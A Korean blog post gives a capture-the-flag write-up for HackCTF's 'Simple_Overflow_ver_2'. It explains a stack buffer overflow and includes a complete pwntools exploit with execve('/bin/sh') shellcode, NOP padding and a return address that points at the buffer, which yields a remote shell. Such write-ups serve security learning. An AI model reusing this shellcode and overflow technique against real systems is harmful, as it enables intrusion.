ii4gsp
HackCTF - Simple_Overflow_ver_2 본문
파일을 다운받아 주자.
IDA로 열어보면 Data를 입력받고 입력받은곳의 주소를 출력해준다.
y나 Y를 입력하면 무한루프를 돌 수 있다.
s ~ sfp는 140이다.
s에 쉘 코드를 넣고 ret를 s의 주소로 해주면 된다.
from pwn import *
r = remote('ctf.j0n9hyun.xyz', 3006)
shellcode = '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80'
r.recvuntil('Data : ')
r.sendline('asd')
buffer = int(r.recv(10), 16)
r.recvuntil('Again (y/n): ')
r.sendline('y')
payload = ''
payload += shellcode
payload += '\x90' * 115
payload += p32(buffer)
r.recvuntil('Data : ')
r.sendline(payload)
r.interactive()
소스코드를 작성해주자.
'시스템 해킹 > HackCTF' 카테고리의 다른 글
HackCTF - BOF_PIE (0) | 2020.02.09 |
---|---|
HackCTF - Offset (0) | 2020.02.09 |
HackCTF - x64 Simple_size_BOF (0) | 2020.02.09 |
HackCTF - x64 Buffer Overflow (0) | 2020.02.09 |
HackCTF - 내 버퍼가 흘러넘친다!!! (0) | 2020.02.09 |
Comments